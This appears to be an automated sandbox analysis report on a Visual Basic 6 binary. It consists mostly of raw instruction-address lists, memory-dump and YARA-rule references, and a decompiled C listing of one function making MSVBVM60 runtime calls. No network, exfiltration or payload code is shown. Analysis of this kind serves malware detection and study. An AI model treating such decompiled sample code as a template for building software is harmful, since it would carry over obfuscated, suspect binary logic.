0x0040184a
0x0040184b
0x0040184f
0x00401854
0x00401855
0x00401857
0x00401859
0x0040185a
0x0040185e
0x0040185f
0x00401866
0x00401868
0x00401869
0x0040186c
0x0040186c
0x0040186d
0x0040186f
0x00401871
0x00401873
0x00401875
0x00401877
0x00401879
0x0040187b
0x0040187d
0x0040187f
0x00401881
0x00401883
0x00401885
0x00401887
0x00401889
0x0040188b
0x0040188d
0x0040188f
0x00401891
0x00401892
0x00401894
0x00401897
0x00401899
0x0040189b
0x0040189b
0x0040189e
0x0040189f
0x004018a1
0x004018a2
0x00401918
0x00401918
0x0040191a
0x0040191e
0x00401921
0x00401923
0x00401925
0x00401925
0x00401928
0x00401929
0x00401990
0x00401990
0x00401991
0x00401993
0x00401995
0x00401999
0x0040199b
0x0040199d
0x004019a0
0x004019a1
0x004019a5
0x004019a6
0x004019a7
0x004019a9
0x004019ab
0x004019ae
0x004019af
0x004019b1
0x004019b3
0x004019b5
0x004019b6
0x004019b7
0x004019b9
0x004019bd
0x004019be
0x004019bf
0x004019c1
0x004019c3
0x004019c9
0x004019cb
0x004019ce
0x004019cf
0x004019d1
0x004019d5
0x004019d6
0x004019d7
0x004019d9
0x004019db
0x004019e1
0x004019e3
0x004019e4
0x004019e4
0x004019e5
0x004019e6
0x004019e7
0x004019e9
0x004019ed
0x004019ee
0x004019ef
0x004019f1
0x004019f1
0x004019f3
0x004019fa
0x004019ff
0x00401a01
0x00401a03
0x00401a05
0x00401a07
0x00401a09
0x00401a0b
0x00401a0e
0x00401a10
0x00401a12
0x00401a14
0x00401a16
0x00401a18
0x00401a1a
0x00401a1c
0x00401a1e
0x00401a20
0x00401a22
0x00401a24
0x00401a26
0x00401a28
0x00401a2b
0x00401a2d
0x00401a2e
0x00401a30
0x00401a32
0x00401a34
0x00401a36
0x00401a38
0x00401a3a
0x00401a3c
0x00401a3e
0x00401a40
0x00401a45
0x00401a47
0x00401a4d
0x00401a4e
0x00401a4f
0x00401a52
0x00401a54
0x00401a5a
0x00401a5c
0x00401a5e
0x00401a60
0x00401a62
0x00401a64
0x00401a66
0x00401a68
0x00401a6a
0x00401a6c
0x00401a6e
0x00401a70
0x00401a78
0x00401a7b
0x00401a7c
0x00401a7e
0x00401a82
0x00401a85
0x00401a86
0x00401a88
0x00401a8c
0x00401a8d
0x00401a8f
0x00401a92
0x00401a93
0x00401a95
0x00401a97
0x00401a9a
0x00401a9b
0x00401aa0
0x00401aa2
0x00401aa4
0x00401aa7
0x00401aa9
0x00401aaf
0x00401ab1
0x00401ab3
0x00401ab5
0x00401ab7
0x00401ab9
0x00401abb
0x00401abd
0x00401abf
0x00401ac1
0x00401ac3
0x00401ac5
0x00401ac7
0x00401ac9
0x00401acb
0x00401acd
0x00401acf
0x00401ad1
0x00401ad3
0x00401ad5
0x00401ad7
0x00401ad9
0x00401adb
0x00401add
0x00401adf
0x00401ae1
0x00401ae3
0x00401ae5
0x00401ae7
0x00401ae9
0x00401aeb
0x00401aed
0x00401aef
0x00401af1
0x00401af3
0x00401af5
0x00401af7
0x00401af9
0x00401afb
0x00401afd
0x00401aff
0x00401b01
0x00401b03
0x00401b05
0x00401b07
0x00401b09
0x00401b0b
0x00401b0d
0x00401b0f
0x00401b11
0x00401b13
0x00401b15
0x00401b17
0x00401b19
0x00401b1b
0x00401b1d
0x00401b1f
0x00401b21
0x00401b23
0x00401b25
0x00401b27
0x00401b29
0x00401b2b
0x00401b2d
0x00401b2f
0x00401b31
0x00401b33
0x00401b35
0x00401b37
0x00401b39
0x00401b3b
0x00401b3d
0x00401b3f
0x00401b41
0x00401b43
0x00401b45
0x00401b47
0x00401b49
0x00401b4b
0x00401b4d
0x00401b4f
0x00401b51
0x00401b53
0x00401b55
0x00401b57
0x00401b59
0x00401b5b
0x00401b5d
0x00401b5f
0x00401b61
0x00401b63
0x00401b65
0x00401b67
0x00401b69
0x00401b6b
0x00401b6d
0x00401b6f
0x00401b71
0x00401b73
0x00401b75
0x00401b77
0x00401b79
0x00401b7b
0x00401b7d
0x00401b7f
0x00401b81
0x00401b83
0x00401b85
0x00401b87
0x00401b89
0x00401b8b
0x00401b8d
0x00401b8f
0x00401b91
0x00401b93
0x00401b95
0x00401b97
0x00401b99
0x00401b9b
0x00401b9d
0x00401b9f
0x00401ba1
0x00401ba3
0x00401ba5
0x00401ba7
0x00401ba9
0x00401bab
0x00401bad
0x00401baf
0x00401bb1
0x00401bb3
0x00401bb5
0x00401bb7
0x00401bb9
0x00401bbb
0x00401bbd
0x00401bbf
0x00401bc1
0x00401bc3
0x00401bc5
0x00401bc7
0x00401bc9
0x00401bcb
0x00401bcd
0x00401bcf
0x00401bd1
0x00401bd3
0x00401bd5
0x00401bd7
0x00401bd9
0x00401bdb
0x00401bdd
0x00401bdf
0x00401be1
0x00401be3
0x00401be5
0x00401be7
0x00401be9
0x00401beb
0x00401bed
0x00401bef
0x00401bf1
0x00401bf3
0x00401bf5
0x00401bf7
0x00401bf9
0x00401bfb
0x00401bfd
0x00401bff
0x00401c01
0x00401c03
0x00401c05
0x00401c07
0x00401c09
0x00401c0b
0x00401c0d
0x00401c0f
0x00401c11
0x00401c13
0x00401c15
0x00401c17
0x00401c19
0x00401c1b
0x00401c1d
0x00401c1f
0x00401c21
0x00401c23
0x00401c25
0x00401c27
0x00401c29
0x00401c2b
0x00401c2d
0x00401c2f
0x00401c31
0x00401c33
0x00401c35
0x00401c37
0x00401c39
0x00401c3b
0x00401c3d
0x00401c3f
0x00401c41
0x00401c43
0x00401c45
0x00401c47
0x00401c49
0x00401c4b
0x00401c4d
0x00401c4f
0x00401c51
0x00401c53
0x00401c55
0x00401c57
0x00401c59
0x00401c5b
0x00401c5d
0x00401c5f
0x00401c61
0x00401c63
0x00401c65
0x00401c67
0x00401c69
0x00401c6b
0x00401c6d
0x00401c6f
0x00401c71
0x00401c73
0x00401c75
0x00401c77
0x00401c79
0x00401c7b
0x00401c7d
0x00401c7f
0x00401c81
0x00401c83
0x00401c85
0x00401c87
0x00401c89
0x00401c8b
0x00401c8d
0x00401c8f
0x00401c91
0x00401c93
0x00401c95
0x00401c97
0x00401c99
0x00401c9b
0x00401c9d
0x00401c9f
0x00401ca1
0x00401ca3
0x00401ca5
0x00401ca7
0x00401ca9
0x00401cab
0x00401cad
0x00401caf
0x00401cb1
0x00401cb3
0x00401cb5
0x00401cb7
0x00401cb9
0x00401cbb
0x00401cbd
0x00401cbf
0x00401cc5
0x00401cc7
0x00401cca
0x00401ccd
0x00401ccf
0x00401cd0
0x00401cd7
0x00401cd9
0x00401cda
0x00401cdc
0x00401cde
0x00401ce0
0x00401ce2
0x00401ce4
0x00401ce6
0x00401ce8
0x00401cea
0x00401cec
0x00401cee
0x00401cf1
0x00401cf3
0x00401cf5
0x00401cf7
0x00401cf9
0x00401cfb
0x00401cfd
0x00401cfe
0x00401cfe
0x00401d00
0x00401d02
0x00401d04
0x00401d06
0x00401d09
0x00401d0b
0x00401d0d
0x00401d0f
0x00401d11
0x00401d14
0x00401d15
0x00401d17
0x00401d1a
0x00401d1c
0x00401d1f
0x00401d20
0x00401d2a
0x00401d2c
0x00401d2e
0x00401d30
0x00401d32
0x00401d34
0x00401d36
0x00401d38
0x00401d3a
0x00401d3c
0x00401d3e
0x00401d40
0x00401d42
0x00401d44
0x00401d46
0x00401d48
0x00401d4a
0x00401d4c
0x00401d4e
0x00401d50
0x00401d52
0x00401d54
0x00401d56
0x00401d58
0x00401d58
0x00401d5a
0x00401d5c
0x00401d5e
0x00401d62
0x00401d63
0x00401d6a
0x00401d6c
0x00401d6d
0x00401d6d
0x00401d71
0x00401d77
0x00401d7a
0x00401d7f
0x00401d81
0x00401d83
0x00401d85
0x00401d87
0x00401d89
0x00401d8b
0x00401d8d
0x00401d8f
0x00401d91
0x00401d93
0x00401d95
0x00401d97
0x00401d99
0x00401d9b
0x00401d9d
0x00401d9f
0x00401da1
0x00401da3
0x00401da5
0x00401da7
0x00401da9
0x00401dab
0x00401dad
0x00401db1
0x00401db3
0x00401db5
0x00401db7
0x00401dba
0x00401dbc
0x00401dbf
0x00401dc0
0x00401dc0
0x0040192b
0x00401930
0x00401931
0x00401936
0x0040193a
0x0040193c
0x0040193e
0x00401940
0x00401942
0x00401945
0x0040194d
0x0040194f
0x00401957
0x0040195a
0x0040195b
0x0040195c
0x0040195d
0x0040195e
0x0040195f
0x00401960
0x00401961
0x00401963
0x00401965
0x00401967
0x0040196a
0x0040196e
0x0040196e
0x0040196f
0x00401970
0x00000000
0x00000000
0x00401972
0x00401973
0x00401973
0x00401975
0x00401975
0x0040197a
0x0040197f
0x00401983
0x00000000
0x00000000
0x00401985
0x00401986
0x00401989
0x0040198a
0x0040198d
0x0040198e
0x00000000
0x0040198e
0x004018a4
0x004018a6
0x004018ad
0x004018ae
0x004018b0
0x004018b2
0x004018b4
0x004018b5
0x004018b7
0x004018ba
0x004018bd
0x004018bf
0x004018c5
0x004018c6
0x004018c8
0x004018ce
0x004018d3
0x004018d4
0x004018d6
0x004018d8
0x004018da
0x004018dc
0x004018dd
0x004018dd
0x004018e1
0x00401915
0x00401915
0x00401917
0x00000000
0x00401917
0x004018e4
0x004018e6
0x004018e9
0x004018eb
0x004018f1
0x004018f4
0x004018f6
0x004018f8
0x004018fb
0x004018fc
0x004018fd
0x004018fe
0x004018ff
0x00401904
0x00401906
0x00401907
0x00000000
0x00000000
0x00401909
0x0040190c
0x00000000
0x00000000
0x0040190e
0x0040190f
0x00401911
0x00401913
0x00401914
0x00000000

APIs

#100.MSVBVM60(VB5!6&*), ref: 004017ED

Strings

VB5!6&*, xrefs: 004017E8

Memory Dump Source

Source File: 00000000.00000002.374396224.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.374393124.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374417553.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374421574.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 95fb986cdaf0f2c66c063706fac3e55ac8faacf47c53cb7c7fb66832af578a3a
Instruction ID: 32d30ae9ace5c845f6493d7c7ec87f4790599e64bffe5bb52e54a4d43caddf0e
Opcode Fuzzy Hash: 95fb986cdaf0f2c66c063706fac3e55ac8faacf47c53cb7c7fb66832af578a3a
Instruction Fuzzy Hash: 2181326108E3C18FC7038BB49DB55A17FB0AE5321471E05EBC4C1DF0A3E26D596AD766

Uniqueness

Uniqueness Score: -1.00%

Function 00404D00, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.374396224.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.374393124.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374417553.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374421574.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28d05f379157fd6cbb8f4dc8600fc9555ee0e5ad297752e8bc0607155f382008
Instruction ID: ee5e4ecaab7ba40a50de1139cca2f29e67b198a7f3c8a5f81a4c234ee41b8196
Opcode Fuzzy Hash: 28d05f379157fd6cbb8f4dc8600fc9555ee0e5ad297752e8bc0607155f382008
Instruction Fuzzy Hash: E8B0129439D541EEE21066946C0152421C0A6C43903E10C33F501F71D0DB38DF00C23D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004213CA, Relevance: 103.7, APIs: 56, Strings: 3, Instructions: 459
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E004213CA(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v32;
				short _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				char _v52;
				char _v56;
				signed int _v64;
				char _v72;
				signed int _v80;
				char _v88;
				signed int _v96;
				char _v104;
				signed int _v112;
				char _v120;
				char _v124;
				signed int _v132;
				char _v140;
				signed int _v148;
				char _v156;
				intOrPtr _v164;
				intOrPtr _v172;
				intOrPtr _v180;
				intOrPtr _v188;
				intOrPtr _v196;
				char _v204;
				short _v208;
				signed int _v212;
				signed int _v216;
				void* _v220;
				signed int _v224;
				signed int _v232;
				intOrPtr* _v236;
				signed int _v240;
				signed int _v244;
				intOrPtr* _v248;
				signed int _v252;
				signed int _v256;
				intOrPtr* _v260;
				signed int _v264;
				signed int _v268;
				intOrPtr* _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				char* _t225;
				signed int _t230;
				signed int _t236;
				signed int _t237;
				signed int _t245;
				signed int _t250;
				signed int _t261;
				signed int _t266;
				signed int _t272;
				signed int _t277;
				short _t278;
				char* _t279;
				signed int _t283;
				signed int _t287;
				signed int _t295;
				intOrPtr _t351;
				intOrPtr* _t352;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t351;
				L00401530();
				_v12 = _t351;
				_v8 = 0x4014d8;
				L00401734();
				_v64 = _v64 & 0x00000000;
				_v72 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v72);
				L00401608();
				L00401752();
				L00401794();
				_push(0);
				_push(3);
				_push(1);
				_push(0);
				_t225 =  &_v124;
				_push(_t225);
				_push(0x10);
				_push(0x880);
				L0040173A();
				_t352 = _t351 + 0x1c;
				_v132 = 2;
				_v140 = 2;
				_push(0);
				_push(_v124);
				L0040172E();
				L00401764();
				_v148 = 3;
				_v156 = 2;
				_push(1);
				_push(_v124);
				L0040172E();
				L00401764();
				_v164 = 3;
				_v172 = 2;
				_push(2);
				_push(_v124);
				L0040172E();
				L00401764();
				_v180 = 4;
				_v188 = 2;
				_push(3);
				_push(_v124);
				L0040172E();
				L00401764();
				_push( &_v124);
				asm("fld1");
				_push(_t225);
				 *_t352 = __fp0;
				_push( &_v72);
				L00401602();
				_push( &_v124);
				_push(0);
				L004015FC();
				_v196 = 2;
				_v204 = 0x8002;
				_push( &_v72);
				_t230 =  &_v204;
				_push(_t230);
				L00401704();
				_v212 = _t230;
				L00401794();
				if(_v212 != 0) {
					if( *0x425698 != 0) {
						_v236 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v236 = 0x425698;
					}
					_v212 =  *_v236;
					_t261 =  *((intOrPtr*)( *_v212 + 0x14))(_v212,  &_v52);
					asm("fclex");
					_v216 = _t261;
					if(_v216 >= 0) {
						_v240 = _v240 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v212);
						_push(_v216);
						L004017B8();
						_v240 = _t261;
					}
					_v220 = _v52;
					_v132 = 0x80020004;
					_v140 = 0xa;
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t266 =  *((intOrPtr*)( *_v220 + 0x13c))(_v220, L"Sorthavsrejser", 0x10);
					asm("fclex");
					_v224 = _t266;
					if(_v224 >= 0) {
						_v244 = _v244 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x4050a8);
						_push(_v220);
						_push(_v224);
						L004017B8();
						_v244 = _t266;
					}
					L0040178E();
					if( *0x425698 != 0) {
						_v248 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v248 = 0x425698;
					}
					_v212 =  *_v248;
					_t272 =  *((intOrPtr*)( *_v212 + 0x14))(_v212,  &_v52);
					asm("fclex");
					_v216 = _t272;
					if(_v216 >= 0) {
						_v252 = _v252 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v212);
						_push(_v216);
						L004017B8();
						_v252 = _t272;
					}
					_v220 = _v52;
					_t277 =  *((intOrPtr*)( *_v220 + 0x140))(_v220,  &_v208);
					asm("fclex");
					_v224 = _t277;
					if(_v224 >= 0) {
						_v256 = _v256 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x4050a8);
						_push(_v220);
						_push(_v224);
						L004017B8();
						_v256 = _t277;
					}
					_t278 = _v208;
					_v36 = _t278;
					L0040178E();
					L00401626();
					_push(_t278);
					_t279 =  &_v56;
					_push(_t279);
					L004017C4();
					_v220 = _t279;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					if( *0x425010 != 0) {
						_v260 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v260 = 0x425010;
					}
					_t283 =  &_v52;
					L004017C4();
					_v212 = _t283;
					_t287 =  *((intOrPtr*)( *_v212 + 0xa0))(_v212,  &_v208, _t283,  *((intOrPtr*)( *((intOrPtr*)( *_v260)) + 0x30c))( *_v260));
					asm("fclex");
					_v216 = _t287;
					if(_v216 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0xa0);
						_push(0x405038);
						_push(_v212);
						_push(_v216);
						L004017B8();
						_v264 = _t287;
					}
					_t295 =  *((intOrPtr*)( *_v220 + 0x44))(_v220, _v208,  &_v72,  &_v88,  &_v104,  &_v120);
					asm("fclex");
					_v224 = _t295;
					if(_v224 >= 0) {
						_v268 = _v268 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x406278);
						_push(_v220);
						_push(_v224);
						L004017B8();
						_v268 = _t295;
					}
					_push( &_v56);
					_push( &_v52);
					_push(2);
					L004017A6();
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push(4);
					L004017A0();
					_t352 = _t352 + 0x20;
				}
				L00401734();
				_v132 =  &_v32;
				_v140 = 0x4008;
				_push(2);
				_push( &_v140);
				_push( &_v72);
				L004015F6();
				_v148 = 0x406274;
				_v156 = 0x8008;
				_push( &_v72);
				_t236 =  &_v156;
				_push(_t236);
				L00401704();
				_v212 = _t236;
				L00401794();
				_t237 = _v212;
				if(_t237 != 0) {
					_push(L"18:18:18");
					_push( &_v72);
					L004015F0();
					_push( &_v72);
					L00401728();
					L00401752();
					L00401794();
					if( *0x425698 != 0) {
						_v272 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v272 = 0x425698;
					}
					_v212 =  *_v272;
					_t245 =  *((intOrPtr*)( *_v212 + 0x14))(_v212,  &_v52);
					asm("fclex");
					_v216 = _t245;
					if(_v216 >= 0) {
						_v276 = _v276 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v212);
						_push(_v216);
						L004017B8();
						_v276 = _t245;
					}
					_v220 = _v52;
					_t250 =  *((intOrPtr*)( *_v220 + 0x60))(_v220,  &_v48);
					asm("fclex");
					_v224 = _t250;
					if(_v224 >= 0) {
						_v280 = _v280 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x4050a8);
						_push(_v220);
						_push(_v224);
						L004017B8();
						_v280 = _t250;
					}
					_v232 = _v48;
					_v48 = _v48 & 0x00000000;
					L00401752();
					L0040178E();
					_v148 = 0x80020004;
					_v156 = 0xa;
					_v132 = 0x80020004;
					_v140 = 0xa;
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t237 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10);
					asm("fclex");
					_v212 = _t237;
					if(_v212 >= 0) {
						_v284 = _v284 & 0x00000000;
					} else {
						_push(0x2b0);
						_push(0x404af0);
						_push(_a4);
						_push(_v212);
						L004017B8();
						_v284 = _t237;
					}
				}
				asm("wait");
				_push(0x421b93);
				L00401740();
				L00401740();
				L00401740();
				L00401740();
				L00401740();
				return _t237;
			}

0x004213cf
0x004213da
0x004213db
0x004213e7
0x004213ef
0x004213f2
0x004213ff
0x00421404
0x00421408
0x0042140f
0x00421411
0x00421413
0x00421415
0x0042141a
0x0042141b
0x00421425
0x0042142d
0x00421432
0x00421434
0x00421436
0x00421438
0x0042143a
0x0042143d
0x0042143e
0x00421440
0x00421445
0x0042144a
0x0042144d
0x00421454
0x00421464
0x00421466
0x00421469
0x00421472
0x00421477
0x00421481
0x00421491
0x00421493
0x00421496
0x0042149f
0x004214a4
0x004214ae
0x004214be
0x004214c0
0x004214c3
0x004214cc
0x004214d1
0x004214db
0x004214eb
0x004214ed
0x004214f0
0x004214f9
0x00421501
0x00421502
0x00421504
0x00421505
0x0042150b
0x0042150c
0x00421514
0x00421515
0x00421517
0x0042151c
0x00421526
0x00421533
0x00421534
0x0042153a
0x0042153b
0x00421540
0x0042154a
0x00421558
0x00421565
0x00421582
0x00421567
0x00421567
0x0042156c
0x00421571
0x00421576
0x00421576
0x00421594
0x004215ac
0x004215af
0x004215b1
0x004215be
0x004215e0
0x004215c0
0x004215c0
0x004215c2
0x004215c7
0x004215cd
0x004215d3
0x004215d8
0x004215d8
0x004215ea
0x004215f0
0x004215f7
0x00421604
0x00421611
0x00421612
0x00421613
0x00421614
0x00421628
0x0042162e
0x00421630
0x0042163d
0x00421662
0x0042163f
0x0042163f
0x00421644
0x00421649
0x0042164f
0x00421655
0x0042165a
0x0042165a
0x0042166c
0x00421678
0x00421695
0x0042167a
0x0042167a
0x0042167f
0x00421684
0x00421689
0x00421689
0x004216a7
0x004216bf
0x004216c2
0x004216c4
0x004216d1
0x004216f3
0x004216d3
0x004216d3
0x004216d5
0x004216da
0x004216e0
0x004216e6
0x004216eb
0x004216eb
0x004216fd
0x00421718
0x0042171e
0x00421720
0x0042172d
0x00421752
0x0042172f
0x0042172f
0x00421734
0x00421739
0x0042173f
0x00421745
0x0042174a
0x0042174a
0x00421759
0x00421760
0x00421767
0x0042176c
0x00421771
0x00421772
0x00421775
0x00421776
0x0042177b
0x00421781
0x00421788
0x0042178f
0x00421796
0x0042179d
0x004217a4
0x004217ab
0x004217b2
0x004217c0
0x004217dd
0x004217c2
0x004217c2
0x004217c7
0x004217cc
0x004217d1
0x004217d1
0x00421801
0x00421805
0x0042180a
0x00421825
0x0042182b
0x0042182d
0x0042183a
0x0042185f
0x0042183c
0x0042183c
0x00421841
0x00421846
0x0042184c
0x00421852
0x00421857
0x00421857
0x0042188c
0x0042188f
0x00421891
0x0042189e
0x004218c0
0x004218a0
0x004218a0
0x004218a2
0x004218a7
0x004218ad
0x004218b3
0x004218b8
0x004218b8
0x004218ca
0x004218ce
0x004218cf
0x004218d1
0x004218dc
0x004218e0
0x004218e4
0x004218e8
0x004218e9
0x004218eb
0x004218f0
0x004218f0
0x004218fb
0x00421903
0x00421906
0x00421910
0x00421918
0x0042191c
0x0042191d
0x00421922
0x0042192c
0x00421939
0x0042193a
0x00421940
0x00421941
0x00421946
0x00421950
0x00421955
0x0042195e
0x00421964
0x0042196c
0x0042196d
0x00421975
0x00421976
0x00421980
0x00421988
0x00421994
0x004219b1
0x00421996
0x00421996
0x0042199b
0x004219a0
0x004219a5
0x004219a5
0x004219c3
0x004219db
0x004219de
0x004219e0
0x004219ed
0x00421a0f
0x004219ef
0x004219ef
0x004219f1
0x004219f6
0x004219fc
0x00421a02
0x00421a07
0x00421a07
0x00421a19
0x00421a31
0x00421a34
0x00421a36
0x00421a43
0x00421a65
0x00421a45
0x00421a45
0x00421a47
0x00421a4c
0x00421a52
0x00421a58
0x00421a5d
0x00421a5d
0x00421a6f
0x00421a75
0x00421a82
0x00421a8a
0x00421a8f
0x00421a99
0x00421aa3
0x00421aaa
0x00421ab7
0x00421ac4
0x00421ac5
0x00421ac6
0x00421ac7
0x00421acb
0x00421ad8
0x00421ad9
0x00421ada
0x00421adb
0x00421ae4
0x00421aea
0x00421aec
0x00421af9
0x00421b1b
0x00421afb
0x00421afb
0x00421b00
0x00421b05
0x00421b08
0x00421b0e
0x00421b13
0x00421b13
0x00421af9
0x00421b22
0x00421b23
0x00421b6d
0x00421b75
0x00421b7d
0x00421b85
0x00421b8d
0x00421b92

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 004213E7
__vbaStrCopy.MSVBVM60(?,?,?,?,00401536), ref: 004213FF
#704.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0042141B
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00421425
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0042142D
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00421445
__vbaDerefAry1.MSVBVM60(?,00000000), ref: 00421469
__vbaVarMove.MSVBVM60(?,00000000), ref: 00421472
__vbaDerefAry1.MSVBVM60(?,00000001,?,?,?,00000000), ref: 00421496
__vbaVarMove.MSVBVM60(?,00000001,?,?,?,00000000), ref: 0042149F
__vbaDerefAry1.MSVBVM60(?,00000002,?,?,?,00000001,?,?,?,00000000), ref: 004214C3
__vbaVarMove.MSVBVM60(?,00000002,?,?,?,00000001,?,?,?,00000000), ref: 004214CC
__vbaDerefAry1.MSVBVM60(?,00000003,?,?,?,00000002,?,?,?,00000001,?,?,?,00000000), ref: 004214F0
__vbaVarMove.MSVBVM60(?,00000003,?,?,?,00000002,?,?,?,00000001,?,?,?,00000000), ref: 004214F9
#665.MSVBVM60(?,?,?,?,00000003,?,?,?,00000002,?,?,?,00000001,?,?,?), ref: 0042150C
__vbaErase.MSVBVM60(00000000,?,?,?,?,?,00000003,?,?,?,00000002,?,?,?,00000001), ref: 00421517
__vbaVarTstNe.MSVBVM60(00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002,?,?,?), ref: 0042153B
__vbaFreeVar.MSVBVM60(00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002,?,?,?), ref: 0042154A
__vbaNew2.MSVBVM60(00405078,00425698,00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002), ref: 00421571
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 004215D3
__vbaChkstk.MSVBVM60(?,?,?,00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002), ref: 00421604
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,0000013C,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421655
__vbaFreeObj.MSVBVM60(?,?,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 0042166C
__vbaNew2.MSVBVM60(00405078,00425698,?,?,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421684
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014,?,?,?,?,?,00008002,?,00000000,?,?,?,?), ref: 004216E6
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000140,?,?,?,?,?,?,?,00008002,?,00000000,?,?), ref: 00421745
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421767
#685.MSVBVM60(?,?,?,?,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 0042176C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00008002,?,00000000,?,?,?,?), ref: 00421776
__vbaNew2.MSVBVM60(00404358,00425010,?,00000000,?,?,?,?,?,?,?,00008002,?,00000000,?,?), ref: 004217CC
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00008002,?,00000000,?,?,?,?), ref: 00421805
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000000A0,?,?,?,?,?,?,?,00008002,?,00000000,?,?), ref: 00421852
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406278,00000044,?,?,?,?,?,?,?,?,?,?,00008002,?), ref: 004218B3
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,00008002,?,00000000), ref: 004218D1
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 004218EB
__vbaStrCopy.MSVBVM60(00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002,?,?,?), ref: 004218FB
#515.MSVBVM60(?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002), ref: 0042191D
__vbaVarTstNe.MSVBVM60(00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421941
__vbaFreeVar.MSVBVM60(00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421950
#541.MSVBVM60(?,18:18:18,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 0042196D
__vbaStrVarMove.MSVBVM60(?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?), ref: 00421976
__vbaStrMove.MSVBVM60(?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?), ref: 00421980
__vbaFreeVar.MSVBVM60(?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?), ref: 00421988
__vbaNew2.MSVBVM60(00405078,00425698,?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?), ref: 004219A0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002), ref: 00421A02
